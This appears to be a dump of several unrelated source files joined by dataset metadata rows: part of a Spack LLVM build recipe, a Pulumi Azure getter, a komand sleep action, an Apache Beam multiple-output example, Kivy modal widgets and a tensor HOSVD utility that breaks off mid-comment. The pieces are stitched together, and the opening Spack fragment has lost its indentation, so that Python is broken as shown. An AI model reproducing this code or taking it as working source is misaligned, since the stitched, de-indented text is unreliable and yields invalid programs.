for key in ('c', 'cxx'):
msg = '{0} compiler not found for {1}'
assert key in compilers, msg.format(key, spec)
@property
def cc(self):
msg = "cannot retrieve C compiler [spec is not concrete]"
assert self.spec.concrete, msg
if self.spec.external:
return self.spec.extra_attributes['compilers'].get('c', None)
result = None
if '+clang' in self.spec:
result = os.path.join(self.spec.prefix.bin, 'clang')
return result
@property
def cxx(self):
msg = "cannot retrieve C++ compiler [spec is not concrete]"
assert self.spec.concrete, msg
if self.spec.external:
return self.spec.extra_attributes['compilers'].get('cxx', None)
result = None
if '+clang' in self.spec:
result = os.path.join(self.spec.prefix.bin, 'clang++')
return result
@property
def fc(self):
msg = "cannot retrieve Fortran compiler [spec is not concrete]"
assert self.spec.concrete, msg
if self.spec.external:
return self.spec.extra_attributes['compilers'].get('fc', None)
result = None
if '+flang' in self.spec:
result = os.path.join(self.spec.prefix.bin, 'flang')
return result
@property
def f77(self):
msg = "cannot retrieve Fortran 77 compiler [spec is not concrete]"
assert self.spec.concrete, msg
if self.spec.external:
return self.spec.extra_attributes['compilers'].get('f77', None)
result = None
if '+flang' in self.spec:
result = os.path.join(self.spec.prefix.bin, 'flang')
return result
@run_before('cmake')
def codesign_check(self):
if self.spec.satisfies("+code_signing"):
codesign = which('codesign')
mkdir('tmp')
llvm_check_file = join_path('tmp', 'llvm_check')
copy('/usr/bin/false', llvm_check_file)
try:
codesign('-f', '-s', 'lldb_codesign', '--dryrun',
llvm_check_file)
except ProcessError:
# Newer LLVM versions have a simple script that sets up
                # automatically when run with sudo privileges
setup = Executable("./lldb/scripts/macos-setup-codesign.sh")
try:
setup()
except Exception:
raise RuntimeError(
                        'spack was unable to either find or set up '
                        'code-signing on your system. Please refer to '
                        'https://lldb.llvm.org/resources/build.html#'
                        'code-signing-on-macos for details on how to '
                        'create this identity.'
)
def setup_build_environment(self, env):
env.append_flags("CXXFLAGS", self.compiler.cxx11_flag)
def setup_run_environment(self, env):
if "+clang" in self.spec:
env.set("CC", join_path(self.spec.prefix.bin, "clang"))
env.set("CXX", join_path(self.spec.prefix.bin, "clang++"))
if "+flang" in self.spec:
env.set("FC", join_path(self.spec.prefix.bin, "flang"))
env.set("F77", join_path(self.spec.prefix.bin, "flang"))
root_cmakelists_dir = "llvm"
def cmake_args(self):
spec = self.spec
python = spec['python']
cmake_args = [
"-DLLVM_REQUIRES_RTTI:BOOL=ON",
"-DLLVM_ENABLE_RTTI:BOOL=ON",
"-DLLVM_ENABLE_EH:BOOL=ON",
"-DCLANG_DEFAULT_OPENMP_RUNTIME:STRING=libomp",
"-DPYTHON_EXECUTABLE:PATH={0}".format(python.command.path),
"-DLIBOMP_USE_HWLOC:BOOL=ON",
"-DLIBOMP_HWLOC_INSTALL_DIR={0}".format(spec["hwloc"].prefix),
]
if python.version >= Version("3.0.0"):
cmake_args.append("-DPython3_EXECUTABLE={0}".format(
python.command.path))
else:
cmake_args.append("-DPython2_EXECUTABLE={0}".format(
python.command.path))
projects = []
if "+cuda" in spec:
cmake_args.extend(
[
"-DCUDA_TOOLKIT_ROOT_DIR:PATH=" + spec["cuda"].prefix,
"-DLIBOMPTARGET_NVPTX_COMPUTE_CAPABILITIES={0}".format(
",".join(spec.variants["cuda_arch"].value)
),
"-DCLANG_OPENMP_NVPTX_DEFAULT_ARCH=sm_{0}".format(
spec.variants["cuda_arch"].value[-1]
),
]
)
else:
# still build libomptarget but disable cuda
cmake_args.extend(
[
"-DCUDA_TOOLKIT_ROOT_DIR:PATH=IGNORE",
"-DCUDA_SDK_ROOT_DIR:PATH=IGNORE",
"-DCUDA_NVCC_EXECUTABLE:FILEPATH=IGNORE",
"-DLIBOMPTARGET_DEP_CUDA_DRIVER_LIBRARIES:STRING=IGNORE",
]
)
if "+omp_debug" in spec:
cmake_args.append("-DLIBOMPTARGET_ENABLE_DEBUG:Bool=ON")
if "+python" in spec and "+lldb" in spec:
cmake_args.append("-DLLDB_USE_SYSTEM_SIX:Bool=TRUE")
if "+lldb" in spec and spec.satisfies("@10.0.0:,doe"):
cmake_args.append("-DLLDB_ENABLE_PYTHON:Bool={0}".format(
'ON' if '+python' in spec else 'OFF'))
if "+lldb" in spec and spec.satisfies("@:9.9.9"):
cmake_args.append("-DLLDB_DISABLE_PYTHON:Bool={0}".format(
'ON' if '~python' in spec else 'OFF'))
if "+gold" in spec:
cmake_args.append(
"-DLLVM_BINUTILS_INCDIR=" + spec["binutils"].prefix.include
)
if "+clang" in spec:
projects.append("clang")
projects.append("clang-tools-extra")
projects.append("openmp")
if "+flang" in spec:
projects.append("flang")
if "+lldb" in spec:
projects.append("lldb")
if "+lld" in spec:
projects.append("lld")
if "+compiler-rt" in spec:
projects.append("compiler-rt")
if "+libcxx" in spec:
projects.append("libcxx")
projects.append("libcxxabi")
cmake_args.append("-DCLANG_DEFAULT_CXX_STDLIB=libc++")
if "+mlir" in spec:
projects.append("mlir")
if "+internal_unwind" in spec:
projects.append("libunwind")
if "+polly" in spec:
projects.append("polly")
cmake_args.append("-DLINK_POLLY_INTO_TOOLS:Bool=ON")
if "+shared_libs" in spec:
cmake_args.append("-DBUILD_SHARED_LIBS:Bool=ON")
if "+llvm_dylib" in spec:
cmake_args.append("-DLLVM_BUILD_LLVM_DYLIB:Bool=ON")
if "+split_dwarf" in spec:
cmake_args.append("-DLLVM_USE_SPLIT_DWARF:Bool=ON")
if "+all_targets" not in spec: # all is default on cmake
targets = ["NVPTX", "AMDGPU"]
if spec.target.family == "x86" or spec.target.family == "x86_64":
targets.append("X86")
elif spec.target.family == "arm":
targets.append("ARM")
elif spec.target.family == "aarch64":
targets.append("AArch64")
elif (
spec.target.family == "sparc"
or spec.target.family == "sparc64"
):
targets.append("Sparc")
elif (
spec.target.family == "ppc64"
or spec.target.family == "ppc64le"
or spec.target.family == "ppc"
or spec.target.family == "ppcle"
):
targets.append("PowerPC")
cmake_args.append(
"-DLLVM_TARGETS_TO_BUILD:STRING=" + ";".join(targets)
)
if "+omp_tsan" in spec:
cmake_args.append("-DLIBOMP_TSAN_SUPPORT=ON")
if spec.satisfies("@bolt"):
projects.remove("openmp")
projects.append("bolt")
cmake_args.append("-DLIBOMP_USE_BOLT_DEFAULT=ON")
if "+argobots" in spec and spec.satisfies("@bolt"):
cmake_args.append("-DLIBOMP_USE_ARGOBOTS=ON")
if self.compiler.name == "gcc":
gcc_prefix = ancestor(self.compiler.cc, 2)
cmake_args.append("-DGCC_INSTALL_PREFIX=" + gcc_prefix)
if spec.satisfies("platform=cray") or spec.satisfies("platform=linux"):
cmake_args.append("-DCMAKE_BUILD_WITH_INSTALL_RPATH=1")
if self.spec.satisfies("~code_signing platform=darwin"):
cmake_args.append('-DLLDB_USE_SYSTEM_DEBUGSERVER=ON')
        # Semicolon-separated list of projects to enable
cmake_args.append(
"-DLLVM_ENABLE_PROJECTS:STRING={0}".format(";".join(projects))
)
return cmake_args
@run_before("build")
def pre_install(self):
with working_dir(self.build_directory):
# When building shared libraries these need to be installed first
make("install-LLVMTableGen")
make("install-LLVMDemangle")
make("install-LLVMSupport")
@run_after("install")
def post_install(self):
spec = self.spec
# unnecessary if we get bootstrap builds in here
if "+cuda" in self.spec:
ompdir = "build-bootstrapped-omp"
# rebuild libomptarget to get bytecode runtime library files
with working_dir(ompdir, create=True):
cmake_args = [
self.stage.source_path + "/openmp",
"-DCMAKE_C_COMPILER:PATH={0}".format(
spec.prefix.bin + "/clang"
),
"-DCMAKE_CXX_COMPILER:PATH={0}".format(
spec.prefix.bin + "/clang++"
),
"-DCMAKE_INSTALL_PREFIX:PATH={0}".format(spec.prefix),
]
cmake_args.extend(self.cmake_args())
cmake_args.append(
"-DLIBOMPTARGET_NVPTX_ENABLE_BCLIB:BOOL=TRUE"
)
# work around bad libelf detection in libomptarget
cmake_args.append(
"-DLIBOMPTARGET_DEP_LIBELF_INCLUDE_DIR:String={0}".format(
spec["libelf"].prefix.include
)
)
cmake(*cmake_args)
make()
make("install")
if "+python" in self.spec:
install_tree("llvm/bindings/python", site_packages_dir)
if "+clang" in self.spec:
install_tree("clang/bindings/python", site_packages_dir)
with working_dir(self.build_directory):
install_tree("bin", join_path(self.prefix, "libexec", "llvm"))
| 36.318505
| 120
| 0.571261
|
2cc826d445f4791051e41c58f178f84cc8bfc30b
| 189
|
py
|
Python
|
fmriprep/data/__init__.py
|
hstojic/fmriprep
|
c92bf833fecf645a2fbf3943486c665a9ebc54f7
|
[
"BSD-3-Clause"
] | 36
|
2019-04-07T18:53:15.000Z
|
2021-04-04T10:35:54.000Z
|
fmriprep/data/__init__.py
|
hstojic/fmriprep
|
c92bf833fecf645a2fbf3943486c665a9ebc54f7
|
[
"BSD-3-Clause"
] | 178
|
2019-02-27T16:36:06.000Z
|
2021-04-06T12:48:38.000Z
|
fmriprep/data/__init__.py
|
hstojic/fmriprep
|
c92bf833fecf645a2fbf3943486c665a9ebc54f7
|
[
"BSD-3-Clause"
] | 20
|
2019-04-05T19:17:26.000Z
|
2021-03-25T14:47:32.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
""" Data fetchers module """
| 31.5
| 73
| 0.608466
|
985cf9dd32260537971ea0cfa769ceaafdd3fb93
| 4,521
|
py
|
Python
|
sdk/python/pulumi_azure_native/network/v20180101/get_network_watcher.py
|
pulumi-bot/pulumi-azure-native
|
f7b9490b5211544318e455e5cceafe47b628e12c
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20180101/get_network_watcher.py
|
pulumi-bot/pulumi-azure-native
|
f7b9490b5211544318e455e5cceafe47b628e12c
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20180101/get_network_watcher.py
|
pulumi-bot/pulumi-azure-native
|
f7b9490b5211544318e455e5cceafe47b628e12c
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetNetworkWatcherResult',
'AwaitableGetNetworkWatcherResult',
'get_network_watcher',
]
@pulumi.output_type
class GetNetworkWatcherResult:
"""
Network watcher in a resource group.
"""
def __init__(__self__, etag=None, id=None, location=None, name=None, provisioning_state=None, tags=None, type=None):
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def etag(self) -> Optional[str]:
return pulumi.get(self, "etag")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> str:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state of the resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetNetworkWatcherResult(GetNetworkWatcherResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetNetworkWatcherResult(
etag=self.etag,
id=self.id,
location=self.location,
name=self.name,
provisioning_state=self.provisioning_state,
tags=self.tags,
type=self.type)
def get_network_watcher(network_watcher_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetNetworkWatcherResult:
"""
Network watcher in a resource group.
:param str network_watcher_name: The name of the network watcher.
:param str resource_group_name: The name of the resource group.
"""
__args__ = dict()
__args__['networkWatcherName'] = network_watcher_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:network/v20180101:getNetworkWatcher', __args__, opts=opts, typ=GetNetworkWatcherResult).value
return AwaitableGetNetworkWatcherResult(
etag=__ret__.etag,
id=__ret__.id,
location=__ret__.location,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
tags=__ret__.tags,
type=__ret__.type)
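# Illustrative usage sketch (the watcher and resource-group names below are
# placeholders, not part of this module):
#   watcher = get_network_watcher(network_watcher_name='my-watcher',
#                                 resource_group_name='my-rg')
#   print(watcher.location, watcher.provisioning_state)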
| 32.06383
| 143
| 0.63017
|
94c687b16303c76f881119ee92688a85081714b2
| 548
|
py
|
Python
|
sleep/komand_sleep/actions/sleep/action.py
|
emartin-merrill-r7/insightconnect-plugins
|
a589745dbcc9f01d3e601431e77ab7221a84c117
|
[
"MIT"
] | null | null | null |
sleep/komand_sleep/actions/sleep/action.py
|
emartin-merrill-r7/insightconnect-plugins
|
a589745dbcc9f01d3e601431e77ab7221a84c117
|
[
"MIT"
] | null | null | null |
sleep/komand_sleep/actions/sleep/action.py
|
emartin-merrill-r7/insightconnect-plugins
|
a589745dbcc9f01d3e601431e77ab7221a84c117
|
[
"MIT"
] | null | null | null |
import komand
import time
from .schema import SleepInput, SleepOutput
class Sleep(komand.Action):
def __init__(self):
super(self.__class__, self).__init__(
name='sleep',
description='Suspend execution for an interval of time',
input=SleepInput(),
output=SleepOutput())
def run(self, params={}):
_time = params.get('interval')
time.sleep(_time)
return { 'slept': _time }
def test(self):
"""TODO: Test action"""
return {}
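# Illustrative usage sketch; the 'interval' key mirrors the parameter read in
# run() above:
#   action = Sleep()
#   result = action.run({'interval': 2})  # blocks for ~2 seconds
#   assert result == {'slept': 2}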
| 24.909091
| 72
| 0.569343
|
7896027dd412ab6f75451c615bb3df46cb7d3b43
| 6,986
|
py
|
Python
|
sdks/python/apache_beam/examples/cookbook/multiple_output_pardo.py
|
dexterchan/beam
|
01e500c2dd0d699aea0434154b69fd59d824700f
|
[
"Apache-2.0"
] | 2
|
2019-12-14T04:24:33.000Z
|
2020-02-21T07:17:40.000Z
|
sdks/python/apache_beam/examples/cookbook/multiple_output_pardo.py
|
dexterchan/beam
|
01e500c2dd0d699aea0434154b69fd59d824700f
|
[
"Apache-2.0"
] | 14
|
2020-02-12T22:20:41.000Z
|
2021-11-09T19:41:23.000Z
|
sdks/python/apache_beam/examples/cookbook/multiple_output_pardo.py
|
dexterchan/beam
|
01e500c2dd0d699aea0434154b69fd59d824700f
|
[
"Apache-2.0"
] | 1
|
2020-02-09T02:51:50.000Z
|
2020-02-09T02:51:50.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A workflow demonstrating a DoFn with multiple outputs.
DoFns may produce multiple outputs. Outputs that are not the default ("main")
output are marked with a tag at output time and later the same tag will be used
to get the corresponding result (a PCollection) for that output.
This is a slightly modified version of the basic wordcount example. In this
example words are divided into 2 buckets: short words (3 characters in length
or less) and words (all other words). There will be 3 output files:::
[OUTPUT]-chars : Character count for the input.
[OUTPUT]-short-words : Word count for short words only.
[OUTPUT]-words : Word count for all other words.
To execute this pipeline locally, specify a local output file or output prefix
on GCS:::
--output [YOUR_LOCAL_FILE | gs://YOUR_OUTPUT_PREFIX]
To execute this pipeline using the Google Cloud Dataflow service, specify
pipeline configuration:::
--project YOUR_PROJECT_ID
--staging_location gs://YOUR_STAGING_DIRECTORY
--temp_location gs://YOUR_TEMP_DIRECTORY
--job_name YOUR_JOB_NAME
--runner DataflowRunner
and an output prefix on GCS:::
--output gs://YOUR_OUTPUT_PREFIX
"""
from __future__ import absolute_import
import argparse
import logging
import re
import apache_beam as beam
from apache_beam import pvalue
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions
class SplitLinesToWordsFn(beam.DoFn):
"""A transform to split a line of text into individual words.
This transform will have 3 outputs:
- main output: all words that are longer than 3 characters.
- short words output: all other words.
- character count output: Number of characters in each processed line.
"""
# These tags will be used to tag the outputs of this DoFn.
OUTPUT_TAG_SHORT_WORDS = 'tag_short_words'
OUTPUT_TAG_CHARACTER_COUNT = 'tag_character_count'
def process(self, element):
"""Receives a single element (a line) and produces words and character
counts.
Important things to note here:
- For a single element you may produce multiple main outputs:
words of a single line.
- For that same input you may produce multiple outputs, potentially
across multiple PCollections
- Outputs may have different types (count) or may share the same type
(words) as with the main output.
Args:
element: processing element.
Yields:
words as main output, short words as tagged output, line character count
as tagged output.
"""
# yield a count (integer) to the OUTPUT_TAG_CHARACTER_COUNT tagged
# collection.
yield pvalue.TaggedOutput(
self.OUTPUT_TAG_CHARACTER_COUNT, len(element))
words = re.findall(r'[A-Za-z\']+', element)
for word in words:
if len(word) <= 3:
# yield word as an output to the OUTPUT_TAG_SHORT_WORDS tagged
# collection.
yield pvalue.TaggedOutput(self.OUTPUT_TAG_SHORT_WORDS, word)
else:
# yield word to add it to the main collection.
yield word
class CountWords(beam.PTransform):
"""A transform to count the occurrences of each word.
A PTransform that converts a PCollection containing words into a PCollection
of "word: count" strings.
"""
def expand(self, pcoll):
def count_ones(word_ones):
(word, ones) = word_ones
return (word, sum(ones))
def format_result(word_count):
(word, count) = word_count
return '%s: %s' % (word, count)
return (pcoll
| 'pair_with_one' >> beam.Map(lambda x: (x, 1))
| 'group' >> beam.GroupByKey()
| 'count' >> beam.Map(count_ones)
| 'format' >> beam.Map(format_result))
def run(argv=None, save_main_session=True):
"""Runs the workflow counting the long words and short words separately."""
parser = argparse.ArgumentParser()
parser.add_argument('--input',
default='gs://dataflow-samples/shakespeare/kinglear.txt',
help='Input file to process.')
parser.add_argument('--output',
required=True,
help='Output prefix for files to write results to.')
known_args, pipeline_args = parser.parse_known_args(argv)
# We use the save_main_session option because one or more DoFn's in this
# workflow rely on global context (e.g., a module imported at module level).
pipeline_options = PipelineOptions(pipeline_args)
pipeline_options.view_as(SetupOptions).save_main_session = save_main_session
with beam.Pipeline(options=pipeline_options) as p:
lines = p | ReadFromText(known_args.input)
# with_outputs allows accessing the explicitly tagged outputs of a DoFn.
split_lines_result = (lines
| beam.ParDo(SplitLinesToWordsFn()).with_outputs(
SplitLinesToWordsFn.OUTPUT_TAG_SHORT_WORDS,
SplitLinesToWordsFn.OUTPUT_TAG_CHARACTER_COUNT,
main='words'))
# split_lines_result is an object of type DoOutputsTuple. It supports
# accessing result in alternative ways.
words, _, _ = split_lines_result
short_words = split_lines_result[
SplitLinesToWordsFn.OUTPUT_TAG_SHORT_WORDS]
character_count = split_lines_result.tag_character_count
# pylint: disable=expression-not-assigned
(character_count
| 'pair_with_key' >> beam.Map(lambda x: ('chars_temp_key', x))
| beam.GroupByKey()
| 'count chars' >> beam.Map(lambda char_counts: sum(char_counts[1]))
| 'write chars' >> WriteToText(known_args.output + '-chars'))
# pylint: disable=expression-not-assigned
(short_words
| 'count short words' >> CountWords()
| 'write short words' >> WriteToText(
known_args.output + '-short-words'))
# pylint: disable=expression-not-assigned
(words
| 'count words' >> CountWords()
| 'write words' >> WriteToText(known_args.output + '-words'))
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
run()
| 36.385417
| 80
| 0.703979
|
307d685d2df6b51fa52c6f7deb5b17d9fd5124ef
| 7,034
|
py
|
Python
|
modals.py
|
devMoxie/MyKivyWidgets
|
5e0ddcef272eb53443e8fb89a02cb3a8cc517548
|
[
"MIT"
] | null | null | null |
modals.py
|
devMoxie/MyKivyWidgets
|
5e0ddcef272eb53443e8fb89a02cb3a8cc517548
|
[
"MIT"
] | null | null | null |
modals.py
|
devMoxie/MyKivyWidgets
|
5e0ddcef272eb53443e8fb89a02cb3a8cc517548
|
[
"MIT"
] | null | null | null |
from kivy.uix.modalview import ModalView
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.properties import ObjectProperty
from kivy.lang import Builder
from icons.iconfonts import register
from typography import Li
from extend_button_behavior import ExtendedButtonBehavior
"""
modals
======
This module contains classes for 3 different types of modal widgets.
Required Modules
----------------
* `typography`
* `extend_button_behavior`
* `icons`
"""
Builder.load_file('modals.kv')
Builder.load_file('typography.kv')
register('default_font', 'icons/fontawesome-webfont.ttf', 'icons/font-awesome.fontd')
class CloseButton(ExtendedButtonBehavior, Label):
    """This widget uses an icon to display a button with a hover effect."""
pass
class Dialog(Popup):
"""Defines a modal based on `kivy.uix.popup`.
Features
--------
* A title bar with markup enabled.
    * A content container holding a variable number of Li widgets.
Attributes
----------
grid : ObjectProperty
This property is defined in `<Dialog>` in `modals.kv`.
title : str
Inherited from `Popup`. Text for the title bar.
Parameters
----------
title : str
Required.
messages : list of str
For each string in `messages` an Li widget is added to `grid`.
Required.
ico : str
Icon name. Optional. Defaults to "fa-circle".
icon_color : str
Optional. Defaults to "20c100".
icon_size : str
Optional. Defaults to "12sp".
"""
def __init__(self,
messages,
title,
ico="fa-circle",
icon_color="20c100",
icon_size="12sp",
*args, **kwargs):
super(Dialog, self).__init__(*args, **kwargs)
self.title = title
self.title_align = 'center'
self.title_size = '18sp'
        # Hack: Enable markup on the title Label.
self.children[0].children[2].markup = True
for msg in messages:
self.grid.add_widget(Li(text=msg,
ico=ico,
icon_color=icon_color,
icon_size=icon_size))
class LoadingModal(ModalView):
"""A modal that displays "loading".
This modal does not have a close button and needs to be closed
programmatically using `kivy.clock.Clock`.
    The layout is defined in `modals.kv`.
"""
pass
class ModalBtnClose(ModalView):
"""A modal widget with more custom styles and a close button.
This modal is designed for a single string with an icon.
Attributes
----------
msg : StringProperty
Text to display. Required.
ico : StringProperty
The icon to display. The default icon is 'fa-circle'.
Optional.
icon_color : StringProperty
The color of the icon. The default icon_color is '20c100'.
Optional.
"""
# msg = StringProperty(None)
# ico = StringProperty(None)
# icon_color = StringProperty(None)
def __init__(self, msg, ico="fa-circle", icon_color="20c100", *args, **kwargs):
self.msg = msg
self.ico = ico
self.icon_color = icon_color
super(ModalBtnClose, self).__init__(*args, **kwargs)
class ContentModal(Popup):
"""docstring for ContentModal"""
box = ObjectProperty(None)
modal_content = ObjectProperty(None)
def __init__(self, modal_content=None, title="", *args, **kwargs):
self.modal_content = modal_content
super(ContentModal, self).__init__(*args, **kwargs)
self.box.add_widget(self.modal_content)
self.title = title
self.title_align = 'center'
self.title_size = '18sp'
        # Hack: Enable markup on the title Label.
self.children[0].children[2].markup = True
if __name__ == '__main__':
from kivy.app import App
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.scrollview import ScrollView
from kivy.uix.gridlayout import GridLayout
from kivy.uix.button import Button
from kivy.clock import Clock
from icons.iconfonts import icon
from typography import P
class RootWidget(AnchorLayout):
def __init__(self, *args, **kwargs):
super(RootWidget, self).__init__(*args, **kwargs)
cont = BoxLayout(orientation='horizontal', size_hint=(None, None), width=1360, height=120)
btn1 = Button(text="Open Dialog", size_hint=(None, None), size=(340, 120))
btn1.bind(on_release=self.open_dialog)
btn2 = Button(text="Open LoadingModal", size_hint=(None, None), size=(340, 120))
btn2.bind(on_release=self.open_loading_modal)
btn3 = Button(text="Open ModalBtnClose", size_hint=(None, None), size=(340, 120))
btn3.bind(on_release=self.open_modal_btn_close)
btn4 = Button(text="Open ContentModal", size_hint=(None, None), size=(340, 120))
btn4.bind(on_release=self.open_content_modal)
for b in [btn1, btn2, btn3, btn4]:
cont.add_widget(b)
self.add_widget(cont)
def open_dialog(self, *args):
title = u"{} [b]Dialog Title[/b]".format(icon("fa-th-list", "18sp", "4d8cf5"))
msgs = ["This is message {}.".format(i) for i in range(10)]
d = Dialog(title=title,
messages=msgs,
ico="fa-angle-right",
icon_size="16sp")
d.open()
def open_loading_modal(self, *args):
mod = LoadingModal()
mod.open()
Clock.schedule_once(lambda dt: mod.dismiss(), 2)
def open_modal_btn_close(self, *args):
mod = ModalBtnClose(msg="Are you sure you made the right move?",
ico="fa-warning",
icon_color="ff2222")
mod.open()
def open_content_modal(self, *args):
t1 = "This also leads to some other annoying behaviour - as well as the text not wrapping, you might have observed that the halign and valign properties seem to do nothing by default."
sv = ScrollView()
grid = GridLayout(cols=1, size_hint_y=None)
grid.bind(minimum_height=grid.setter('height'))
for i in range(20):
grid.add_widget(P(text=t1))
sv.add_widget(grid)
title = u"{} Content Modal".format(icon("fa-bell-o", "18sp", "4d8cf5"))
mod = ContentModal(modal_content=sv, title=title)
mod.open()
class TestApp(App):
def build(self):
return RootWidget()
TestApp().run()
| 29.679325
| 196
| 0.586011
|
740d6f2954d1ca11471964a4e8de98cc030ef4ea
| 5,715
|
py
|
Python
|
utils/tensor_old.py
|
pengyuan/markov2tensor
|
4bcdcba6273dc7b671d81953da934188135dbca3
|
[
"MIT"
] | 1
|
2018-03-20T08:28:25.000Z
|
2018-03-20T08:28:25.000Z
|
utils/tensor_old.py
|
pengyuan/markov2tensor
|
4bcdcba6273dc7b671d81953da934188135dbca3
|
[
"MIT"
] | null | null | null |
utils/tensor_old.py
|
pengyuan/markov2tensor
|
4bcdcba6273dc7b671d81953da934188135dbca3
|
[
"MIT"
] | 2
|
2015-12-16T07:21:15.000Z
|
2018-03-20T08:28:27.000Z
|
#!/usr/bin/env python
# coding: UTF-8
from numpy.linalg import LinAlgError
from scipy.linalg import svd, pinv
import numpy as np
from functools import reduce  # needed by gsvd() and test() on Python 3
def flatten(T, n):
    """D = FLATTEN(T, N) makes a matrix out of a tensor
    such that the fibers along dimension N are aligned along the
    columns of D.
    SYNOPSIS:
    T - a tensor
    N - the mode along which to flatten T.
    AUTHOR Larsson Omberg lom@larssono.com
    DATE 05-June-2009"""
    if n > T.ndim or n <= 0:
        raise ValueError('n has to be between 1 and the number of dimensions of T')
    n = n - 1
    order = [n, ]
    order.extend(range(n + 1, T.ndim))
    order.extend(range(0, n))
    nrows = T.shape[n]
    ncols = np.prod(T.shape) // nrows
    return np.reshape(np.transpose(T, order), (nrows, ncols), order='F')
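# Quick sanity check for flatten (illustrative, not part of the original
# module): the mode-2 flattening of a 2x3x4 tensor is a 3x8 matrix whose
# columns are the mode-2 fibers.
#   T = np.arange(24).reshape((2, 3, 4), order='F')
#   assert flatten(T, 2).shape == (3, 8)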
def hosvd2(T, saveSpace=False):
    """HOSVD N-mode SVD decomposition of N-way tensor
    (T2, Z, Un, Sn, Vn) = HOSVD2(T) decomposes the N-way tensor T into N
    orthogonal matrices stored in Un and a core tensor Z, and returns the
    reconstruction T2 plus the n Tucker1 results in Sn and Vn if
    saveSpace=False (default); otherwise returns [Z, Un].
    Author: Larsson Omberg <lom@larssono.com>
    Date: 11-NOV-2007, 28-February-2008, 5-June-2009, 4-Nov-2010"""
#Find orthogonal matrices
Un=[]; Vn=[]; Sn=[]
for n in range(T.ndim):
Tn = flatten(T, n+1); #FIX
if Tn.shape[1] < Tn.shape[0]:
[U,S,V] = svd(Tn,0);
V=V.T
else:
[V,S,U] = svd(Tn.T,0);
U=U.T
Un.append(U);
if not saveSpace:
Vn.append(V);
Sn.append(S);
Z=T.copy()
for n in range(len(Un)):
Z = nmodmult(Z, Un[n].T, n+1)
    new_T = Z.copy()
    for i in range(len(Un)):
        new_T = nmodmult(new_T, Un[i], i + 1)
if not saveSpace:
return [new_T, Z, Un, Sn, Vn]
return [Z, Un]
def unflatten(T, sizes, n):
    """D = UNFLATTEN(T, SIZES, N) remakes a tensor out of a matrix
    such that the mode-N flattening of the tensor will return the
    matrix T.
    SYNOPSIS:
    T - a matrix of size m x n
    SIZES - shape of the output tensor; prod(SIZES) must equal m*n
    N - the mode along which to unflatten T.
    AUTHOR Larsson Omberg lom@larssono.com
    DATE 21-January-2005, 5-june-2009"""
    sizes = np.asarray(sizes)
    if np.prod(sizes) != np.prod(T.shape) or T.ndim != 2:
        raise ValueError('matrix and output tensor must have same number of elements')
    if n > len(sizes) or n <= 0:
        raise ValueError('n has to be between 1 and the number of dimensions of T')
    order = [n - 1, ]
    order.extend(range(n, len(sizes)))
    order.extend(range(n - 1))
    # ndx = [order ones(1,ndims(b)-length(order))];
    # ndx(ndx) = 1:max(length(order),ndims(b)); % Inverse permutation order
    ndx = np.arange(len(order))
    ndx[order] = np.arange(len(order))  # Inverse permutation order
    d = np.reshape(T, sizes[order], order='F')
    return np.transpose(d, ndx)
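# Round-trip sanity check (illustrative): unflattening the mode-n flattening
# with the original shape recovers the tensor.
#   T = np.arange(24).reshape((2, 3, 4), order='F')
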